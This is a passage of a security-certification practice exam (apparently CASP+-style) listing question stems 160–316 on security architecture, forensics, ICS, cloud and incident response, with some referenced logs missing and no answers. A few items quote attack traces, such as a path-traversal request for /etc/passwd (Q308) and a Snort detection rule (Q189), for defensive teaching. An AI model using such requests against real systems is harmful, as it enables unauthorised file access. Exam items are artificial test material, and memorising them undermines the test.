- Rapid authentication
- Flexible authorization
- Ease of deployment
- Low cost but high functionality
Which of the following approaches best meets these objectives?

Question160: A security administrator is setting up a virtualization solution that needs to run services from a single host. Each service should be the only one running in its environment. Each environment needs to have its own operating system as a base but share the kernel version and properties of the running host. Which of the following technologies would best meet these requirements?

Question161: A security architect recommends replacing the company's monolithic software application with a containerized solution. Historically, secrets have been stored in the application's configuration files. Which of the following changes should the security architect make in the new system?

Question162: A security administrator adding a NAC requirement for all VPN users to ensure the connecting devices are compliant with company policy. Which of the following items provides the HIGHEST assurance to meet this requirement?

Question163: A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.
Which of the following should the engineer report as the ARO for successful breaches?

Question164: An IoT device implements an encryption module built within its SoC, where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacture do if the private key is compromised?

Question165: A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?

Question166: A security architect is reviewing the following organizational specifications for a new application:
- Be sessionless and API-based
- Accept uploaded documents with PII, so all storage must be ephemeral
- Be able to scale on-demand across multiple nodes
- Restrict all network access except for the TLS port
Which of the following ways should the architect recommend the application be deployed in order to meet security and organizational infrastructure requirements?

Question167: An attacker exploited an unpatched vulnerability in a web framework, and then used an application service account that had an insecure configuration to download a rootkit.
The attacker was unable to obtain root privileges Instead the attacker then downloaded a crypto- currency mining program and subsequently was discovered.
The server was taken offline, rebuilt, and patched.
Which of the following should the security engineer suggest to help prevent a similar scenario in the future?

Question168: A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer's laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy. Which of the following solutions should the security architect recommend?

Question169: A global financial firm wants to onboard a new vendor that sells a very specific SaaS application.
The application is only hosted in the vendor's home country, and the firm cannot afford any significant downtime. Which of the following is the GREATEST risk to the firm, assuming the decision is made to work with the new vendor?

Question170: A cyberanalyst has been tasked with recovering PDF files from a provided image file. Which of the following is the BEST file-carving tool for PDF recovery?

Question171: A forensics investigator is analyzing an executable file extracted from storage media that was submitted for evidence. The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file. Which of the following should the investigator use while preserving evidence integrity?

Question172: A Chief Information Security Officer (CISO) reviewed data from a cyber exercise that examined all aspects of the company's response plan. Which of the following best describes what the CISO reviewed?

Question173: A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution?

Question174: A security analyst notices a number of SIEM events that show the following activity:

Which of the following response actions should the analyst take FIRST?

Question175: A company requires a task to be carried by more than one person concurrently. This is an example of:

Question176: An organization must implement controls that are aligned with its financial requirements; specifically, the organization is looking to implement the following:
- Financial transactions that require one reviewer
- Audits of funds disbursements
- Cross-training of employees
Which of the following controls will address the organization's requirements?

Question177: A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?

Question178: An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data.
Which of the following commands should the analyst run to BEST determine whether financial data was lost?

Question179: A company has data it would like to aggregate from its PLCs for data visualization and predictive maintenance purposes. Which of the following is the most likely destination for the tag data from the PLCs?

Question180: A company's user community is being adversely affected by various types of emails whose authenticity cannot be trusted. The Chief Information Security Officer (CISO) must address the problem.
Which of the following solutions would BEST support trustworthy communication solutions?

Question181: A software development firm wants to validate the use of standard libraries as part of the software development process.
Each developer performs unit testing prior to committing changes to the code repository.
Which of the following activities would be BEST to perform after a commit but before the creation of a branch?

Question182: Following a complete outage of the electronic medical record system for more than 18 hours, the hospital's Chief Executive Officer (CEO) has requested that the Chief Information Security Officer (CISO) perform an investigation into the possibility of a disgruntled employee causing the outage maliciously. To begin the investigation, the CISO pulls all event logs and device configurations from the time of the outage. The CISO immediately notices the configuration of a top-of-rack switch from one day prior to the outage does not match the configuration that was in place at the time of the outage. However, none of the event logs show who changed the switch configuration, and seven people have the ability to change it. Because of this, the investigation is inconclusive.
Which of the following processes should be implemented to ensure this information is available for future investigations?

Question183: An analyst reviews the following output collected during the execution of a web application security assessment:

Which of the following attacks would be most likely to succeed, given the output?

Question184: A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints.
The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

Question185: A security architect has designated that a server segment of an enterprise network will require each server to have secure and measured boot capabilities. The architect now wishes to ensure service consumers and peers can verify the integrity of hosted services. Which of the following capabilities must the architect consider for enabling the verification?

Question186: A company recently deployed new servers to create an additional cluster to support a new application. The corporate security policy states that all new servers must be resilient. The new cluster has a high-availability configuration for a smooth failover. The failover was successful following a recent power outage, but both clusters lost critical data, which impacted recovery time.
Which of the following needs to be configured to help ensure minimal delays when power outages occur in the future?

Question187: When implementing a penetration testing program, the Chief Information Security Officer (CISO) designates different organizational groups within the organization as having different responsibilities, attack vectors, and rules of engagement. First, the CISO designates a team to operate from within the corporate environment. This team is commonly referred to as:

Question188: The following messages are displayed when a VPN client is attempting to connect to an OpenVPN server:
OpenSSL: error: 140760FC:SSL routines: SSL23_GET_CLIENT_HELLO: unknown
protocol'
TLS_ERROR: BIO read tls_read_plaintext error'
TLS_ERROR: TLS object->incoming plaintext read error'
TLS_ERROR: TLS handshake failed'
SIGUSR1 [soft, tls_error] received, client_instance restarting'
Which of the following best explains the cause of these messages?

Question189: A security analyst has been provided the following partial Snort IDS rule to review and add into the company's Snort IDS to identify a CVE:
alert tcp any any -> SHOME_NET 3389 (flow:to_server,established;
content:"MS_T120|00|"; fasc_pattern:only)
Which of the following should the analyst recommend to mitigate this type of vulnerability?

Question190: A company processes sensitive cardholder information that is stored in an internal production database and accessed by internet-facing web servers. The company's Chief Information Security Officer (CISO) is concerned with the risks related to sensitive data exposure and wants to implement tokenization of sensitive information at the record level. The company implements a one-to-many mapping of primary credit card numbers to temporary credit card numbers.
Which of the following should the CISO consider in a tokenization system?

Question191: A recent security assessment generated a recommendation to transition Wi-Fi to WPA2/WPA3 Enterprise requiring EAP-TLS. Which of the following conditions must be met for the organization's mobile devices to be able to successfully join the corporate wireless network?

Question192: A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modem operating systems. Which of the following compensating controls should be implemented to BEST protect the server?

Question193: A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?

Question194: A company wants to improve Its active protection capabilities against unknown and zero-day malware. Which of the following Is the MOST secure solution?

Question195: A company's BIA indicates that any loss of more than one hour of data would be catastrophic to the business. Which of the following must be in place to meet this requirement?

Question196: A company is experiencing a large number of attempted network-based attacks against its online store. To determine the best course of action, a security analyst reviews the following logs.

Which of the following should the company do NEXT to mitigate the risk of a compromise from these attacks?

Question197: Which of the following attacks can be mitigated by proper data retention policies?

Question198: A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attacks. Which of the following Is the MOST important infrastructure security design element to prevent an outage?

Question199: A manufacturing company's security engineer is concerned a remote actor may be able to access the ICS that is used to monitor the factory lines.
The security engineer recently proposed some techniques to reduce the attack surface of the ICS to the Chief Information Security Officer (CISO).
Which of the following would BEST track the reductions to show the CISO the engineer's plan is successful during each phase?

Question200: A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively?

Question201: An organization developed a containerized application. The organization wants to run the application in the cloud and automatically scale it based on demand. The security operations team would like to use container orchestration but does not want to assume patching responsibilities. Which of the following service models best meets these requirements?

Question202: An accounting team member received a voicemail message from someone who sounded like the Chief Financial Officer (CFO). In the voicemail message, the caller requested a wire transfer to a bank account the organization had not used before. Which of the following best describes this type of attack?

Question203: A developer wants to develop a secure external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of web-application security. Which of the following is the BEST option?

Question204: A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal?

Question205: An IT department is currently working to implement an enterprise DLP solution. Due diligence and best practices must be followed in regard to mitigating risk. Which of the following ensures that authorized modifications are well planned and executed?

Question206: Which of the following is a security concern for DNP3?

Question207: Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend?

Question208: An organization wants to implement an access control system based on its data classification policy that includes the following data types:
Confidential
Restricted
Internal
Public
The access control system should support SSO federation to map users into groups. Each group should only access systems that process and store data at the classification assigned to the group. Which of the following should the organization implement to enforce its requirements with minimal impact to systems and resources?

Question209: A security engineer needs to ensure production containers are automatically scanned for vulnerabilities before they are accepted into the production environment. Which of the following should the engineer use to automatically incorporate vulnerability scanning on every commit?

Question210: A company has been the target of LDAP injections, as well as brute-force, whaling, and spear- phishing attacks. The company is concerned about ensuring continued system access. The company has already implemented a SSO system with strong passwords. Which of the following additional controls should the company deploy?

Question211: Company A is merging with Company B. Company A is a small, local company. Company B has a large, global presence. The two companies have a lot of duplication in their IT systems, processes, and procedures. On the new Chief Information Officer's (CIO's) first day, a fire breaks out at Company B's main data center. Which of the following actions should the CIO take first?

Question212: A security engineer is concerned about the threat of side-channel attacks. The company experienced a past attack that degraded parts of a SCADA system, causing a fluctuation to
20,000rpm from its normal operating range. As a result, the part deteriorated more quickly than the mean time to failure. A further investigation revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the rpm until the part failed. Which of the following solutions would be BEST to prevent a side-channel attack in the future?

Question213: A security administrator needs to implement a security solution that will:
- Limit the attack surface in case of an incident.
- Improve access control for external and internal network security.
- Improve performance with less congestion on network traffic.
Which of the following should the security administrator do?

Question214: SIMULATION
You are a security analyst tasked with interpreting an Nmap scan output from company's privileged network.
The company's hardening guidelines indicate the following:
There should be one primary server or service per device.

Only default ports should be used.

Non-secure protocols should be disabled.

INSTRUCTIONS
Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed.
For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information:
The IP address of the device

The primary server or service of the device (Note that each IP should by associated with one

service/port only)
The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple

ports may need to be closed to comply with the hardening guidelines)
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question215: The information security manager of an e-commerce company receives an alert over the weekend that all the servers in a datacenter have gone offline.
Upon discussing this situation with the facilities manager, the information security manager learns there was planned electrical maintenance.
The information security manager is upset at not being part of the maintenance planning, as this could have resulted in a loss of:

Question216: Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

Question217: A startup software company recently updated its development strategy to incorporate the Software Development Life Cycle, including revamping the quality assurance and release processes for gold builds. Which of the following would most likely be developed FIRST as part of the overall strategy?

Question218: A company underwent an audit in which the following issues were enumerated:
- Insufficient security controls for internet-facing services, such as
VPN and extranet
- Weak password policies governing external access for third-party
vendors
Which of the following strategies would help mitigate the risks of unauthorized access?

Question219: A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks. Which of the following would BEST enable this activity?

Question220: Joe an application security engineer is performing an audit of an environmental control application.
He has implemented a robust SDLC process and is reviewing API calls available to the application.
During the review, Joe finds the following in a log file.

Which of the following would BEST mitigate the issue Joe has found?

Question221: An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key. Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

Question222: A security analyst and a DevOps engineer are working together to address configuration drifts in highly scalable systems that are leading to increased vulnerability findings. Which of the following recommendations would be best to eliminate this issue?

Question223: A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.
Which of the following techniques would BEST support this?

Question224: An administrator completed remediation for all the findings of a penetration test and notifies the management team that the systems are ready to be placed back into production. Which of the following steps should the management team require the analyst to perform immediately before placing the systems back into production?

Question225: An online video shows a company's Chief Executive Officer (CEO) making a company announcement. The CEO, however, did not make the announcement. Which of the following BEST describes this attack?

Question226: A security manager is determining the best DLP solution for an enterprise.
A list of requirements was created to use during the source selection.
The security manager wants to confirm a solution exists for the requirements that have been defined.
Which of the following should the security manager use?

Question227: An electric car company hires an IT consulting company to improve the cybersecurity of us vehicles.
Which of the following should achieve the BEST long-term result for the company?

Question228: In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?

Question229: An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location.
Currently, the company does not have a process that allows vendors remote access to the corporate network.
Which of the following solutions represents the BEST course of action to allow the contractor access?

Question230: A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker?

Question231: When implementing serverless computing, an organization must still account for:

Question232: During a network defense engagement, a red team is able to edit the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Us er Shell Folders Which of the following tools is the red team using to perform this action?

Question233: SIMULATION
During the course of normal SOC operations, three anomalous events occurred and were flagged as potential IoCs. Evidence for each of these potential IoCs is provided.
INSTRUCTIONS
Review each of the events and select the appropriate analysis and remediation options for each IoC.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question234: A company is looking at sending historical backups containing customer PII to a cloud service provider to save on storage costs.
Which of the following is the MOST important consideration before making this decision?

Question235: A system administrator at a medical imaging company discovers protected health information (PHI) on a general-purpose file server. Which of the following steps should the administrator take NEXT?

Question236: A control systems analyst is reviewing the defensive posture of engineering workstations on the shop floor. Upon evaluation, the analyst makes the following observations:
- Unsupported, end-of-life operating systems were still prevalent on
the shop floor.
- There are no security controls for systems with supported operating
systems.
- There is little uniformity of installed software among the
workstations.
Which of the following would have the greatest impact on the attack surface?

Question237: Ann, a CIRT member, is conducting incident response activities on a network that consists of several hundred virtual servers and thousands of endpoints and users. The network generates more than 10,000 log messages per second. The enterprise belong to a large, web-based cryptocurrency startup, Ann has distilled the relevant information into an easily digestible report for executive management . However, she still needs to collect evidence of the intrusion that caused the incident.
Which of the following should Ann use to gather the required information?

Question238: A social media company wants to change encryption ciphers after identifying weaknesses in the implementation of the existing ciphers. The company needs the new ciphers to meet the following requirements:
- Utilize less RAM than competing ciphers.
- Be more CPU-efficient than previous ciphers.
- Require customers to use TLS 1.3 while broadcasting video or audio.
Which of the following is the best choice for the social media company?

Question239: An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?

Question240: Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?

Question241: The Chief Executive Officer (CEO) of a fast-growing company no longer knows all the employees and is concerned about the company's intellectual property being stolen by an employee.
Employees are allowed to work remotely with flexible hours, creating unpredictable schedules.
Roles are poorly defined due to frequent shifting needs across the company.
Which of the following new initiatives by the information security team would BEST secure the company and mitigate the CEO's concerns?

Question242: After installing an unapproved application on a personal device, a Chief Executive Officer reported an incident to a security analyst. This device is not controlled by the MDM solution, as stated in the BVOD policy. However, the device contained critical confidential information. The cyber incident response team performed the analysis on the device and found the following log:
Wed 12 Dec 2020 10:00:03 Unknown sources is now enabled on this device.
Which of the following is the MOST likely reason for the successful attack?

Question243: A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
Support all phases of the SDLC.

Use tailored website portal software.

Allow the company to build and use its own gateway software.

Utilize its own data management platform.

Continue using agent-based security tools.

Which of the following cloud-computing models should the CIO implement?

Question244: Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks.
Which of the following would have allowed the security team to use historical information to protect against the second attack?

Question245: A company's human resources department recently had its own shadow IT department spin up ten VMs that host a mixture of differently labeled data types (confidential and restricted) on the same VMs.
Which of the following cloud and visualization considerations would BEST address the issue presented in this scenario?

Question246: A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured:

Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

Question247: A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. A single SSID and no guest access will be used. The customer facility is located in a crowded area of town. The customer has asked that the solution require low administrative overhead. Which of the following should the security consultant recommend?

Question248: A pharmaceutical company uses a cloud provider to host thousands of independent resources in object storage. The company needs a practical and effective means of discovering data, monitoring changes, and identifying suspicious activity. Which of the following would best meet these requirements?

Question249: A development team releases updates to an application regularly.
The application is compiled with several standard open-source security products that require a minimum version for compatibility.
During the security review portion of the development cycle, which of the following should be done to minimize possible application vulnerabilities?

Question250: A company with multiple locations has taken a cloud-only approach to its infrastructure. The company does not have standard vendors or systems, resulting in a mix of various solutions put in place by each location. The Chief Information Security Officer wants to ensure that the internal security team has visibility into all platforms. Which of the following best meets this objective?

Question251: Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure. Which of the must occur to ensure the integrity of the image?

Question252: Which of the following risks does expanding business into a foreign country carry?

Question253: A security analyst for a bank received an anonymous tip on the external banking website showing the following:
Protocols supported
- TLS 1.0
- SSL 3
- SSL 2
Cipher suites supported
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA-ECDH p256r1
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA-DH 1024bit
- TLS_RSA_WITH_RC4_128_SHA
TLS_FALLBACK_SCSV non supported
- POODLE
- Weak PFS
- OCSP stapling supported
Which of the following should the analyst use to reproduce these findings comprehensively?

Question254: An engineer wants to assess the OS security configurations on a company's servers.
The engineer has downloaded some files to orchestrate configuration checks.
When the engineer opens a file in a text editor, the following excerpt appears:

Which of the following capabilities would a configuration compliance checker need to support to interpret this file?

Question255: A security analyst is examining a former employee's laptop for suspected evidence of suspicious activity. The analyst uses dd during the investigation. Which of the following best explains why the analyst is using this tool?

Question256: An organization had been leveraging RC4 to protect the confidentiality of a continuous, high- throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is MOST likely to meet the organization's requirements?

Question257: A software development company makes Its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website.
Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company?

Question258: A company wants to implement a cloud-based security solution that will sinkhole malicious DNS requests.
The security administrator has implemented technical controls to direct DNS requests to the cloud servers but wants to extend the solution to all managed and unmanaged endpoints that may have user-defined DNS manual settings.
Which of the following should the security administrator implement to ensure the solution will protect all connected devices?

Question259: A security analyst discovers a new device on the company's dedicated IoT subnet during the most recent vulnerability scan. The scan results show numerous open ports and insecure protocols in addition to default usernames and passwords. A camera needs to transmit video to the security server in the IoT subnet. Which of the following should the security analyst recommend to securely operate the camera?

Question260: A security assessor identified an internet-facing web service API provider that was deemed vulnerable. Execution of testssl provided the following insight:

Which of the following configuration changes would BEST mitigate chosen ciphertext attacks?

Question261: A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:

Which of the following ciphers should the security analyst remove to support the business requirements?

Question262: A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources. Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?

Question263: Which of the following is the best reason for obtaining file hashes from a confiscated laptop?

Question264: A security engineer performed an assessment on a recently deployed web application. The engineer was able to exfiltrate a company report by visiting the following URL:
www.intranet.abc.com/get-files.jsp?file=report.pdf
Which of the following mitigation techniques would be BEST for the security engineer to recommend?

Question265: A user forwarded a suspicious email to a security analyst for review. The analyst examined the email and found that neither the URL nor the attachment showed any indication of malicious activities. Which of the following intelligence collection methods should the analyst use to confirm the legitimacy of the email?

Question266: A security engineer has learned that terminated employees' accounts are not being disabled. The termination dates are updated automatically in the human resources information system software by the appropriate human resources staff. Which of the following would best reduce risks to the organization?

Question267: A company has a website with a huge database. The company wants to ensure that a DR site could be brought online quickly in the event of a failover, and end users would miss no more than
30 minutes of data. Which of the following should the company do to meet these objectives?

Question268: A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.
Which of the following should the company use to prevent data theft?

Question269: A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively?

Question270: A security architect is designing a solution for a new customer who requires significant security capabilities in its environment. The customer has provided the architect with the following set of requirements:
- Capable of early detection of advanced persistent threats.
- Must be transparent to users and cause no performance degradation.
- Allow integration with production and development networks
seamlessly.
- Enable the security team to hunt and investigate live exploitation
techniques.
Which of the following technologies BEST meets the customer's requirements for security capabilities?

Question271: A bank has multiple subsidiaries that have independent infrastructures. The bank's support teams manage all these environments and want to use a single set of credentials. Which of the following is the BEST way to achieve this goal?

Question272: A recent batch of bug bounty findings indicates a systematic issue related to directory traversal. A security engineer needs to prevent flawed code from being deployed into production. Which of the following is the best mitigation strategy for the engineer?

Question273: A software house is developing a new application. The application has the following requirements:
Reduce the number of credential requests as much as possible

Integrate with social networks

Authenticate users

Which of the following is the BEST federation method to use for the application?

Question274: An employee decides to log into an authorized system.
The system does not prompt the employee for authentication prior to granting access to the console, and it cannot authenticate the network resources.
Which of the following attack types can this lead to if it is not mitigated?

Question275: An administrator at a software development company would like to protect the integrity Of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA.
Which of the following is MOST likely the cause of the signature failing?

Question276: A security officer is requiring all personnel working on a special project to obtain a security clearance requisite with the level of all information being accessed. Data on this network must be protected at the same level of each clearance holder. The need to know must be verified by the data owner. Which of the following should the security officer do to meet these requirements?

Question277: A small bank is evaluating different methods to address and resolve the following requirements:
- Must be able to store credit card data using the smallest amount of
data possible.
- Must be compliant with PCI DSS.
- Must maintain confidentiality if one piece of the layer is
compromised.
Which of the following is the BEST solution for the bank?

Question278: In a shared responsibility model for PaaS, which of the following is a customer's responsibility?

Question279: A security administrator needs to implement an X.509 solution for multiple sites within the human resources department. This solution would need to secure all subdomains associated with the domain name of the main human resources web server. Which of the following would need to be implemented to properly secure the sites and provide easier private key management?

Question280: The Chief Executive Officer )CEO) of a small company decides to use cloud computing to host critical corporate data for protection from natural disasters.
The recommended solution is to adopt the public cloud for its cost savings If the CEO insists on adopting the public cloud model, which of the following would be the BEST advice?

Question281: An organization is concerned that its hosted web servers are not running the most updated version of software. Which of the following would work BEST to help identify potential vulnerabilities?

Question282: The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the ICS network. A controller was restarted as part of the troubleshooting process, and the following issue was identified when the controller was restarted:
SECURE BOOT FAILED:
FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B
During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique?

Question283: A security analyst has been tasked with assessing a new API. The analyst needs to be able to test for a variety of different inputs, both malicious and benign, in order to close any vulnerabilities. Which of the following should the analyst use to achieve this goal?

Question284: A regulated company is in the process of refreshing its entire infrastructure. The company has a business-critical process running on an old 2008 Windows server. If this server fails, the company would lose millions of dollars in revenue. Which of the following actions should the company take?

Question285: Over the last 90 days, many storage services has been exposed in the cloud services environments, and the security team does not have the ability to see is creating these instance.
Shadow IT is creating data services and instances faster than the small security team can keep up with them. The Chief information security Officer (CIASO) has asked the security officer (CISO) has asked the security lead architect to architect to recommend solutions to this problem.
Which of the following BEST addresses the problem best address the problem with the least amount of administrative effort?

Question286: A security manager has written an incident response play book for insider attacks and is ready to begin testing it. Which of the following should the manager conduct to test the playbook?

Question287: Users have reported that an internally developed web application is acting erratically, and the response output is inconsistent.
The issue began after a web application dependency patch was applied to improve security.
Which of the following would be the MOST appropriate tool to help identify the issue?

Question288: An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother's maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST?

Question289: A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident. Which of the following would be BEST to proceed with the transformation?

Question290: A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:

Which of the following would BEST mitigate this vulnerability?

Question291: A security architect is tasked with scoping a penetration test that will start next month.
The architect wants to define what security controls will be impacted.
Which of the following would be the BEST document to consult?

Question292: A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

Question293: Which of the following is MOST commonly found in a network SLA contract?

Question294: Which of the following should an organization implement to prevent unauthorized API key sharing?

Question295: The Chief Information Security Officer (CISO) is working with a new company and needs a legal document to ensure all parties understand their roles during an assessment. Which of the following should the CISO have each party sign?

Question296: A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one. Which of the following would be BEST suited to meet these requirements?

Question297: A security architect is advising the application team to implement the following controls in the application before it is released:
- Least privilege
- Blocklist input validation for the following characters: \<>;, ="#+
Based on the requirements, which of the following attacks is the security architect trying to prevent?

Question298: A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet:

Which of the following should the penetration tester conclude about the command output?

Question299: The Chief information Security Officer (CISO) of a small locate bank has a compliance requirement that a third-party penetration test of the core banking application must be conducted annually. Which of the following services would fulfill the compliance requirement with the LOWEST resource usage?

Question300: Ransomware encrypted the entire human resources fileshare for a large financial institution.
Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?

Question301: A web application server is running a legacy operating system with an unpatched RCE (Remote Code Execution) vulnerability. The server cannot be upgraded until the corresponding application code is updated. Which of the following compensating controls would prevent successful exploitation?

Question302: A company purchased Burp Suite licenses this year for each application security engineer. The engineers have used Burp Suite to identify several issues with the company's SaaS application.
In the upcoming year, the Chief Information Security Officer would like to purchase additional tools to protect the SaaS product. Which of the following is the best option?

Question303: company management elects to cancel production. Which of the following risk strategies is the company using in this scenario?

Question304: A junior security researcher has identified a buffer overflow vulnerability leading to remote code execution in a former employer's software. The security researcher asks for the manager's advice on the vulnerability submission process. Which of the following is the best advice the current manager can provide the security researcher?

Question305: The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company- owned and personal devices.
Which of the following should the CIO implement to achieve this goal?

Question306: Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

Question307: A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:
- Fast scanning
- The least false positives possible
- Signature-based
- A low impact on servers when performing a scan
In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will BEST meet the customer's needs?

Question308: A security engineer is reviewing Apache web server logs and has identified the following pattern in the log:
GET https://example.com/image5/../../etc/passwd HTTP/1.1 200 OK
The engineer has also reviewed IDS and firewall logs and established a correlation to an external IP address. Which of the following can be determined regarding the vulnerability and response?

Question309: A penetration tester is given an assignment lo gain physical access to a secure facility with perimeter cameras.
The secure facility does not accept visitors and entry is available only through a door protected by an RFID key and a guard stationed inside the door.
Which of the following would be BEST for the penetration tester to attempt?

Question310: A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes. Which of the following would be BEST to use as part of the process to support copyright protections of the document?

Question311: A Chief Information Security Officer (CISO) is running a test to evaluate the security of the corporate network and attached devices.
Which of the following components should be executed by an outside vendor?

Question312: A security analyst is reviewing the following vulnerability assessment report:

Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?

Question313: Which of the following may indicate a configuration item has reached end-of-life?

Question314: A company is developing a new service product offering that will involve the storage of personal health information. The Chief Information Security Officer (CISO) is researching the relevant compliance regulations. Which of the following best describes the CISO's action?

Question315: The Chief Information Security Officer (CISO) has outlined a five-year plan for the company that includes the following:
- Implement an application security program.
- Reduce the click rate on phishing simulations from 73% to 8%.
- Deploy EDR to all workstations and servers.
- Ensure all systems are sending logs to the SIEM.
- Reduce the percentage of systems with vulnerabilities from 89% to 5%.
Which of the following would BEST aid the CISO in determining whether these goals are obtainable?

Question316: A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network:

Which of the following is the BEST solution to ensure the administrator can complete the assigned task?

